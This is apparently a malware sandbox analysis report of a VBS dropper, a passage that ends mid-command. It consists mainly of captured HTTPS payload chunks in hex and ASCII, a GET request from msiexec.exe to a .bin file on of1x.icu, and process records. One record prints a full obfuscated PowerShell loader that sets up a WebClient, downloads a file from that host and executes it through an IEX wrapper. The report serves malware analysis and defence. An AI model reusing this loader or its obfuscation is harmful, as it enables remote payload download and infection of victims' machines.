                                                                                                                              Data Ascii: qVcpGSP2tTmt9z71YtqI64jPxXsyb0dbhQ/kzqbFO3y0/nPJsS4Lm+bFJBOitrPFkkiVVxIe8c3E/3TsyMUN9rWP0YGHFmXNAXvBgRcmkoOvbVr4roXNtuIaL9D1Pqj+FacpVr/Ix+rD09/LraAi540xihQ270o7Mq8Hm0PYva6Lzi0PinS7xnxZXu+qF+Qg4ZuqNQcencGb/ePhf46TQmMMfjR2Yzv00a1/z7wr8a9UEQ9t1uu49Xkyijs27nK
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 37 56 47 6c 31 4a 46 4f 35 4c 6a 38 56 41 4b 4b 6d 6c 32 61 59 4e 52 75 6a 61 33 79 53 2f 37 48 61 46 6d 39 4e 71 6a 4c 53 70 35 34 57 69 38 56 57 7a 50 4e 4a 6a 34 6e 73 49 65 79 74 42 46 78 44 67 58 75 77 52 4e 69 39 6d 4d 33 31 75 73 64 4a 63 2f 4f 35 49 53 4a 38 39 50 4d 78 46 70 4a 74 6b 2b 73 65 2f 78 61 47 42 7a 31 35 56 72 76 6f 51 70 72 48 72 4c 55 78 4a 44 54 74 49 6f 70 38 57 66 6b 50 36 67 6c 48 6c 4f 76 6f 69 68 66 64 45 47 61 74 32 4c 32 57 42 75 52 66 38 31 78 44 74 79 72 2b 43 53 49 69 34 47 51 63 54 46 73 63 57 44 68 48 48 4f 5a 6e 39 63 43 32 63 64 49 5a 55 48 73 50 45 4d 2b 54 38 47 47 73 67 4c 47 38 43 6d 78 45 5a 53 66 4d 6a 7a 79 4f 58 61 37 61 32 6d 79 46 75 38 4e 56 6f 48 6b 6d 54 42 30 2f 6c 68 32 4f 66 72 78 55 4c 37 6f 71 74 79
                                                                                                                              Data Ascii: 7VGl1JFO5Lj8VAKKml2aYNRuja3yS/7HaFm9NqjLSp54Wi8VWzPNJj4nsIeytBFxDgXuwRNi9mM31usdJc/O5ISJ89PMxFpJtk+se/xaGBz15VrvoQprHrLUxJDTtIop8WfkP6glHlOvoihfdEGat2L2WBuRf81xDtyr+CSIi4GQcTFscWDhHHOZn9cC2cdIZUHsPEM+T8GGsgLG8CmxEZSfMjzyOXa7a2myFu8NVoHkmTB0/lh2OfrxUL7oqty
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 6e 54 74 55 61 57 6f 71 4c 59 5a 58 33 57 47 59 64 68 57 76 32 68 6b 6c 37 48 70 75 47 38 55 75 4f 53 6e 65 75 33 35 51 76 4f 32 5a 36 38 52 6b 36 39 6e 71 62 34 32 72 61 65 5a 4e 34 67 71 55 7a 47 42 4c 6b 5a 71 46 70 4b 70 2b 37 56 4e 30 50 6c 47 58 73 74 74 4a 63 2b 2b 5a 33 53 48 7a 65 6a 61 63 63 62 35 34 67 62 39 43 42 75 5a 78 6a 47 37 79 4e 68 58 71 77 50 47 48 74 2f 43 4d 39 46 34 53 6a 59 69 44 6e 64 57 61 33 44 78 72 6e 54 74 71 57 39 69 6a 52 47 72 34 52 58 4b 63 67 54 39 55 61 57 4e 6f 53 2f 55 59 63 62 30 6e 2b 67 6a 53 62 46 59 51 46 54 56 58 50 4a 2b 51 6f 34 30 79 62 46 65 2f 72 2b 79 48 50 46 38 47 2b 5a 79 61 54 33 54 51 6b 73 63 35 6c 52 70 67 2b 6e 36 70 37 51 34 58 6f 74 4b 6e 73 56 55 4f 47 69 45 72 31 4f 78 78 46 7a 2b 4a 76 48 62
                                                                                                                              Data Ascii: nTtUaWoqLYZX3WGYdhWv2hkl7HpuG8UuOSneu35QvO2Z68Rk69nqb42raeZN4gqUzGBLkZqFpKp+7VN0PlGXsttJc++Z3SHzejaccb54gb9CBuZxjG7yNhXqwPGHt/CM9F4SjYiDndWa3DxrnTtqW9ijRGr4RXKcgT9UaWNoS/UYcb0n+gjSbFYQFTVXPJ+Qo40ybFe/r+yHPF8G+ZyaT3TQksc5lRpg+n6p7Q4XotKnsVUOGiEr1OxxFz+JvHb
                                                                                                                              2024-12-23 05:41:06 UTC1252INData Raw: 2b 34 37 55 73 6c 78 39 61 51 39 67 71 6f 79 4f 32 33 42 2f 61 43 78 51 6a 35 6c 53 30 79 45 76 4c 35 2b 6b 45 53 66 7a 76 6d 61 32 49 70 48 52 38 44 57 68 36 6b 48 67 70 46 44 49 76 58 59 35 51 6d 77 4c 6b 55 70 66 47 2f 46 5a 5a 47 4e 6d 71 54 6a 75 2b 46 7a 50 52 77 41 66 77 73 73 63 2f 38 72 50 47 54 6b 55 48 30 6d 54 42 6b 2f 55 68 32 4b 42 70 7a 72 48 6e 6a 44 54 76 70 68 75 68 61 37 77 50 57 62 4c 42 4d 69 34 58 4d 66 50 6e 56 75 4c 58 2b 2b 77 44 41 4d 6e 67 35 72 4f 69 33 46 65 34 37 42 6f 6d 31 48 6e 76 6e 4c 75 51 71 63 63 62 38 57 38 6d 67 47 62 44 63 52 50 35 54 7a 50 50 30 38 6e 6d 69 31 4c 65 38 63 30 45 2f 62 54 73 35 38 30 4e 64 73 68 78 32 54 63 44 6e 4e 55 4e 74 52 38 39 57 35 79 79 56 64 53 71 7a 47 65 74 53 30 79 48 69 54 76 37 6f 72
                                                                                                                              Data Ascii: +47Uslx9aQ9gqoyO23B/aCxQj5lS0yEvL5+kESfzvma2IpHR8DWh6kHgpFDIvXY5QmwLkUpfG/FZZGNmqTju+FzPRwAfwssc/8rPGTkUH0mTBk/Uh2KBpzrHnjDTvphuha7wPWbLBMi4XMfPnVuLX++wDAMng5rOi3Fe47Bom1HnvnLuQqccb8W8mgGbDcRP5TzPP08nmi1Le8c0E/bTs580Ndshx2TcDnNUNtR89W5yyVdSqzGetS0yHiTv7or


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449737104.21.86.724436804C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-23 05:41:43 UTC175OUTGET /rTPVLEPs/asyclWl80.bin HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Host: of1x.icu
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-23 05:41:44 UTC856INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 23 Dec 2024 05:41:44 GMT
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=14400
                                                                                                                              CF-Cache-Status: MISS
                                                                                                                              Last-Modified: Mon, 23 Dec 2024 05:41:43 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tfN1ZJBBXPquTjKAGtDOpiU3cEv5W38WSGnyulSezXj7phjF2ZBDI4Bsm7u4k4jpsqDe%2BhZrL61qGDmTtuxzvwMueyIB3js9i%2Ffn7ZoU1q8FaAgJ6No%2FA%2BCGxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f660634dc80efa7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1962&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=813&delivery_rate=1433480&cwnd=161&unsent_bytes=0&cid=24108f0f0cda36d7&ts=704&x=0"
                                                                                                                              2024-12-23 05:41:44 UTC513INData Raw: 37 38 62 37 0d 0a 38 a6 b4 85 55 0c cc 3e 7c d6 bc aa 17 e8 cc c7 39 e1 05 b5 e3 b1 e7 0d af a2 a2 6c 45 1e f8 17 2e a9 82 50 94 69 39 2b ce 85 bd c2 6c 8c b5 79 62 c0 15 6e 04 46 f6 ac 29 52 d8 ee 23 4a 2e 7e 6d 68 2a 85 f1 57 68 c3 2a a4 6a 83 ea 8c 16 50 bb b3 24 2d 7d 8a 8e cb 93 88 9f 43 1e c9 1a 4b e8 ed be c9 74 73 d8 11 fb 49 8e f3 ce 85 86 b7 b3 8c 3c 65 02 75 75 d2 2c ce 5d dd ab 52 07 66 a3 67 6b b4 f9 be 64 c1 16 73 92 50 95 bc 2a 9f e0 a6 1b db ac 73 e8 46 e7 b3 e7 eb e3 d2 6f dd e9 b8 46 4e dd 9e 63 f2 e0 e3 85 3d 0e 3e 57 8e c5 56 e4 27 a7 2a c7 ac 1c ae e7 a7 d3 45 16 76 c4 17 f6 84 b9 05 69 f9 9f e8 56 61 5b f5 ad 5d 3d f5 bd 23 2f 97 73 e3 27 01 07 fe b6 10 55 5d df 3a ad 66 43 ab 8a 77 10 13 63 11 9d ca e4 ef 89 bb 46 ee 97 a3 a9 0f 96
                                                                                                                              Data Ascii: 78b78U>|9lE.Pi9+lybnF)R#J.~mh*Wh*jP$-}CKtsI<euu,]RfgkdsP*sFoFNc=>WV'*EviVa[]=#/s'U]:fCwcF
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 09 69 c4 c8 32 d0 43 14 69 07 16 7e 6b 86 6b 80 e4 7a 36 60 b1 72 24 11 2a 01 4b 9a 9a 31 8e c6 92 b7 7e b4 10 fa 66 c6 7f 64 39 92 2e f0 f7 a6 47 b6 28 b7 91 17 bc 47 ba 52 b6 57 2a a7 df b4 60 66 d3 b6 65 b1 b2 7b 22 12 dd 4f e0 13 f3 7f 25 db bb 9a d3 9b a6 1f 35 6d 74 be 5d a1 a5 c0 4e 07 36 9f d7 1c 56 98 52 38 ed b4 ae d2 6b b6 3f b9 63 8b 43 eb 3f 3c 5b 62 2a 61 a2 96 bf cd 85 9d b2 14 56 a2 22 f4 c9 3a 5f a7 2f 18 3d 51 fe 30 1f d1 cf 1b 96 74 a3 e1 8f d0 e4 c3 d5 dc 24 6c 00 39 10 6e 7b bc 29 50 5f 6c 72 b3 53 4e c2 22 86 6f 0a a8 15 81 6b 1c ac 66 27 d0 24 b6 8d 90 26 87 8b 59 54 96 08 4c 34 e5 4d e9 bd b8 2a 30 14 de 7b bf 4c 97 ab ce b5 32 d5 03 b8 c7 18 4d 1e 23 27 43 52 80 d6 82 e7 6a 0e c6 0d 4f de e9 3e f3 8e d0 ca 34 42 7f 1a c0 89 a6 da
                                                                                                                              Data Ascii: i2Ci~kkz6`r$*K1~fd9.G(GRW*`fe{"O%5mt]N6VR8k?cC?<[b*aV":_/=Q0t$l9n{)P_lrSN"okf'$&YTL4M*0{L2M#'CRjO>4B
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: cf ab 62 59 c5 e8 b0 dd 35 ed f6 f9 ff 4d 70 6c b6 bd 39 8e a0 17 bc c3 4d 80 93 4d 5b aa 4d 73 a4 97 43 1a 5a 41 d5 a3 aa 1e 65 8f 09 69 ac 99 5c 95 43 fc 00 22 15 7e 32 ad 17 7e a0 25 36 88 e3 36 e1 17 42 1a 25 df 9a d9 dd e3 91 b7 27 77 a9 6a 53 84 7f 78 01 9e 2e f0 9f c3 29 f3 28 5f ac 32 bf 47 e3 91 dc 57 93 b7 9a f3 60 8e e6 9b 65 9f ae 71 34 23 dd a7 c5 1b af 7a 7c 18 c1 9a 6a 33 83 5d 35 85 6d 93 5d a1 cd b9 20 42 36 77 da 39 55 98 0b db 54 9c 88 bb 19 3a a8 c6 02 8b 2b 68 da 78 5b 8a ad 40 a1 96 6a 0f 3c 31 95 56 56 4b 26 d8 c8 3a e6 0a 6c 5f 3d b8 04 5b 1e d1 e5 35 4b 55 91 c7 8f 38 3f 63 88 dc 4c e1 6e 7b 10 86 be 98 2a 50 f6 a9 18 b3 ea ce 8a 65 86 87 c9 84 15 81 03 cb c2 23 e7 16 e5 e1 fc f3 7f 44 32 b1 59 d1 08 a4 32 86 4c e9 99 19 44 75 ea
                                                                                                                              Data Ascii: bY5Mpl9MM[MsCZAei\C"~2~%66B%'wjSx.)(_2GW`eq4#z|j3]5m] B6w9UT:+hx[@j<1VVK&:l_=[5KU8?cLn{*Pe#D2Y2LDu
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 41 a3 f9 88 2e 78 c7 8c b3 dc 93 3d 5b db 79 73 b8 37 35 b2 7e bb 6b 16 60 06 e4 97 87 6c 2e ff fd 03 ee e7 7c b6 42 43 3a e1 14 05 eb 83 e2 2e ad ad b0 b8 ec ec b5 11 e7 88 c9 8c 7f b6 1d 3e 6e 24 ba c3 25 4a b1 2c 2b aa 1d 50 a7 97 97 55 c7 01 91 e4 aa 1e 56 82 09 69 49 44 16 70 43 14 69 ef 01 78 6b 6e 23 0a c0 da 36 60 b1 d2 ea 11 2a 41 c6 16 be e1 8e c6 92 5f 81 b1 10 fa b7 d7 23 d7 3d 53 ce f5 f4 a3 d7 8b 6f b7 fb 37 ec b8 8f 46 ad 10 2a 58 ca e4 14 23 d3 3d 68 8b 9a 59 5a 8e 08 b2 1f c1 2f 47 b1 80 ec 9a 2c ee c9 91 fa 85 be 96 5d a1 f4 4b 81 ef 57 b6 d7 1c d5 74 4a 95 a9 90 e6 77 d5 82 b6 4e 04 8b 43 81 d5 b6 94 8a 7f 4f a2 96 92 d8 d9 da d6 51 f5 b6 7e b3 c9 b9 a7 a5 5d 1e b4 4c ea 2c 58 d1 02 79 d6 05 3f 08 8a d0 e4 10 d6 87 af 89 5d fc 04 6e 23
                                                                                                                              Data Ascii: A.x=[ys75~k`l.|BC:.>n$%J,+PUViIDpCixkn#6`*A_#=So7F*X#=hYZ/G,]KWtJwNCOQ~]L,Xy?]n#
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: fa 81 15 c1 ed 3a 0b ae 7f bf e7 92 53 e3 8a 94 eb 2e 1a ef 02 40 79 d7 99 b9 4f 9d 65 57 d6 33 f3 f4 a8 2b fd 12 6b c4 39 7c 5f 41 65 7e 45 5d 67 78 2f d8 3a 0c 1e 1b 7f f9 91 d0 56 6a 36 eb 39 83 3d 58 44 2a 87 60 61 d6 2c a6 ad 67 ab c0 68 5e 4f ce d6 b0 cf b6 ba a3 81 95 43 0a 47 ca 5f 91 ce 09 d2 91 42 42 1a 14 3b 66 86 da f9 3f 25 38 88 f4 a4 37 3a be 2b 60 e5 26 ba d9 1a 2a 42 bc 76 84 09 e2 02 96 fb 12 47 14 3f 8c e7 96 f9 6c ae 86 6f ac de 6e b2 3a e1 9c ec 1f 88 cc 11 c0 66 4d 96 b7 7e 3f 44 de 1e 48 b1 ab ed e5 26 a2 1f 16 44 b6 28 5c 9d e8 c8 63 b6 79 66 05 c2 8b da b4 60 38 11 be 65 77 95 1c 5a 66 56 87 09 52 ae 7a 25 8d 20 6b 58 d7 e2 12 dd 2d 72 be 5d 2a 6d 3f 3e 17 de c9 d5 1c 56 c8 d9 d6 05 17 cb fc 19 8c 9c c9 02 dd c8 1a 3f 71 7f 6a b2
                                                                                                                              Data Ascii: :S.@yOeW3+k9|_Ae~E]gx/:Vj69=XD*`a,gh^OCG_BB;f?%87:+`&*BvG?lon:fM~?DH&D(\cyf`8ewZfVRz% kX-r]*m?>V?qj
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 8f db 04 33 25 ff ea 18 d6 fb 0e 06 67 f7 3d 1b 7b 68 6b 87 47 fc 55 0a ac f7 7c 95 e4 c8 1c 78 44 ba 1e bc b8 7b bf 78 d1 21 77 27 38 d5 fd 92 94 15 7f ed d3 85 c5 54 17 4e ba 17 f6 5f e1 3a 57 16 71 18 21 46 47 9f fa 91 e1 09 91 ec 57 5f d9 02 f2 de 46 ad 9d c2 ae 38 65 44 38 2f 2f 1d 3d 0c 1e 2e 22 c8 53 30 b7 62 be 07 a3 e0 93 52 13 a1 71 a4 df 93 5b b6 fb 66 a1 31 97 a1 97 00 35 27 dc 46 cf fb 87 60 95 fd 58 26 52 37 0a 7a 62 9a 96 d2 af 38 35 66 d3 97 50 90 73 90 76 d1 b3 61 cf a9 58 1c 67 d1 68 d9 85 6f da e6 5e 52 32 93 b3 f9 bf dc 7d 9d 21 17 9d b6 83 49 53 79 1b 9d 43 6c b2 ca b6 41 c2 ff ba 65 65 bc cb c9 54 f2 71 b4 40 77 12 fd 2f 78 f9 63 d1 0f 74 62 53 3d eb 5c 82 e8 c9 4b 7c 17 be 57 a1 6c 88 4b 15 6e 84 5e 86 9a c6 1e 05 38 86 12 22 36 ac
                                                                                                                              Data Ascii: 3%g={hkGU|xD{x!w'8TN_:Wq!FGW_F8eD8//=."S0bRq[f15'F`X&R7zb85fPsvaXgho^R2}!ISyClAeeTq@w/xctbS=\K|WlKn^8"6
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 23 e6 58 2e 58 22 3b 8f 86 63 1d 16 1f 7c e7 b3 72 4a 76 16 64 fe 3e 21 f5 55 af 71 bd 0b 84 73 7f 99 8b 0c cb 58 3a f0 84 50 ac 58 fd d0 0f a0 aa 30 51 f4 85 70 d7 05 d7 5d 49 29 18 e2 4b 93 cc 44 86 78 55 7f b0 9a 3f 8e 3f 55 99 40 e1 eb 18 51 c6 eb 99 8a 3d 0c d7 f7 31 c9 ed 1b 0b aa 7f 0f e1 92 53 3a 72 fc 4a 2d 1a 5d 57 75 e3 02 22 bd c4 5b 65 dc 7c 94 2b a8 57 5f d9 16 dc 5c 6b b5 9d f1 31 fa 56 60 79 ba c3 d5 6d 87 f2 27 80 e6 99 b3 46 df 89 07 0a 94 bf 0a bb 5f 04 23 46 84 9c af ad 8e 29 05 36 03 d8 41 3a b4 12 a5 9e 6d 4f 98 ab 52 c5 c9 5f bd fd 11 00 87 c9 8c ab a3 f0 a5 d0 97 4d 2b de c5 fd 08 d0 84 6c 94 a3 97 4b 88 b6 de 1a 1d 42 bf 8c 7b f6 e2 a8 ec 26 eb ab 1b ee 94 16 7e 6b 3d f8 0d 2b 8a 4b 97 4e c5 6a cf a1 8e 1e 11 d9 25 07 82 b6 af 96
                                                                                                                              Data Ascii: #X.X";c|rJvd>!UqsX:PX0Qp]I)KDxU??U@Q=1S:rJ-]Wu"[e|+W_\k1V`ym'F_#F)6A:mOR_M+lKB{&~k=+KNj%
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 4f d2 9f 54 f0 f7 c1 a5 b1 9d 88 7b c2 99 50 73 50 3a 3d 30 67 e2 63 9e 24 9d 4c 7e ad e4 e7 7e 80 ef 67 19 95 e8 aa 03 3d e6 20 36 f1 ca f7 f4 9b 2c 4a bf 91 d6 a2 15 e0 b8 54 39 a5 b4 b1 16 58 1d c1 de 27 ca af 4f bd 94 86 73 7f 99 80 79 f2 72 68 0a 2e 24 7b f9 d9 8c d1 08 c9 93 4d b2 7e fb 82 e6 54 fa 41 2e ff 9d 1a 6f f7 c2 19 58 33 4f a7 5c 9d fa 0b 36 e9 51 6a 21 96 e6 10 a6 71 10 c5 8a 5f 9a 98 c5 77 63 c5 68 1a e4 ed c2 de 2f 66 47 4e ac 11 fb f8 a7 74 61 de 52 c6 d0 28 45 7c 9e b8 fd a8 7e 76 fe 67 cc 35 3e 64 a1 07 35 ee 9f ab 2d cf 5e c8 87 40 61 44 49 e6 0c 8e 61 21 9f da 18 f0 9c 01 22 0c 83 5b 93 5b ae 26 41 f0 2b f4 5b 1a 45 b3 bf 89 a2 d8 28 f0 74 d8 bf 3b fb 48 8c 07 06 59 0a 09 f8 f5 71 f6 8e 10 ef 43 3c 7a 99 a6 55 99 46 32 dd e3 b3 16
                                                                                                                              Data Ascii: OT{PsP:=0gc$L~~g= 6,JT9X'Osyrh.${M~TA.oX3O\6Qj!q_wch/fGNtaR(E|~vg5>d5-^@aDIa!"[[&A+[E(t;HYqC<zUF2
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 57 ac 68 0a 5f 97 b7 f9 eb 12 a2 75 34 0d 97 56 d7 c2 d2 58 0a a5 0e db 21 29 65 77 7a f4 68 9d 68 de d0 c1 19 af 52 d5 74 aa 53 58 9a eb f3 4b 0f 09 db 12 68 5f 03 37 6d 5b 8d 7b ab bb 2d 08 67 e2 e3 46 ab 78 12 6f e4 d6 ef df 84 54 c2 bd e1 fe 12 8d 01 fe 20 42 70 11 b1 b1 00 c2 39 34 4a 00 0f 64 19 b8 de 4e 16 e5 a5 d5 27 c1 ff 2e fc 3a 24 81 55 df 3d 98 d7 9f 7a 29 b2 f4 48 1a 2c 24 5a 40 2c 23 a5 0e aa 32 32 bd 69 5c 3a 11 20 87 8c e5 79 50 6b 8b 9d 9f a6 9f fb 7b b0 3c e6 41 d0 9d 30 3e f1 62 34 1b 64 14 7e f1 16 ab c9 7c ea 42 1a ce 94 68 1c 59 bc 6d 27 4e 8e 65 8e 59 d6 52 ef 25 cc 15 21 e0 94 0c 06 1b db a8 85 72 ec 0f ed 99 78 be 7a f5 cd 1f 8d ca e2 9f df f3 83 f1 18 85 1d 9a 5f c0 c6 d0 55 cf ca 14 78 2f c2 7a 14 79 e4 01 69 93 d1 ff fd 71 d6
                                                                                                                              Data Ascii: Wh_u4VX!)ewzhhRtSXKh_7m[{-gFxoT Bp94JdN'.:$U=z)H,$Z@,#22i\: yPk{<A0>b4d~|BhYm'NeYR%!rxz_Ux/zyiq
                                                                                                                              2024-12-23 05:41:44 UTC1369INData Raw: 7b 7d 43 58 71 16 dc 00 2f 74 ed 9f dd c4 01 af 39 42 f8 45 a6 23 f8 42 4a 89 14 0a 2f 39 27 a6 a3 5a 04 1e fd f9 fd 17 ab f0 c6 fe 0a cf b9 61 69 1c 36 a4 42 2c 21 95 d4 07 99 ae 0c 75 16 7c 82 6f b0 8d aa d3 ee 45 c7 6e 12 bb 97 47 dc c1 6d e2 dc ff 1c af 01 32 01 c5 94 ac 07 83 69 14 bd 54 61 bb af a0 f1 e7 ea 82 e9 b0 98 96 52 23 55 79 1d 28 77 9e a2 db 05 0e 97 eb e9 fb e2 66 a8 25 ff 49 95 24 66 7d 73 d2 3b 8c 3e 65 eb 01 46 a1 de 3a 32 5a b9 fe e1 11 34 c9 e4 7c db 7e 3d c8 7e 8c 80 99 88 cf 02 bb 6c 0a 11 af ff ef b6 9b 5a 7a ef 17 21 41 81 70 5a a2 fb 02 9c 0d 53 f1 b0 6c 99 9f 82 f4 5c 78 cc 2f 4b 88 b9 b1 ef ad d7 0e b8 f0 f1 9f 30 d5 73 17 24 08 25 4c 22 ce 98 30 7f 55 e4 92 53 e9 76 0f 2d 1e 8d ec 39 b9 2d 02 9c 5f 3b a4 6d f6 3a da 3e dd e8
                                                                                                                              Data Ascii: {}CXq/t9BE#BJ/9'Zai6B,!u|oEnGm2iTaR#Uy(wf%I$f}s;>eF:2Z4|~=~lZz!ApZSl\x/K0s$%L"0USv-9-_;m:>


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:00:40:59
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs"
                                                                                                                              Imagebase:0x7ff7e5590000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:00:41:00
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT 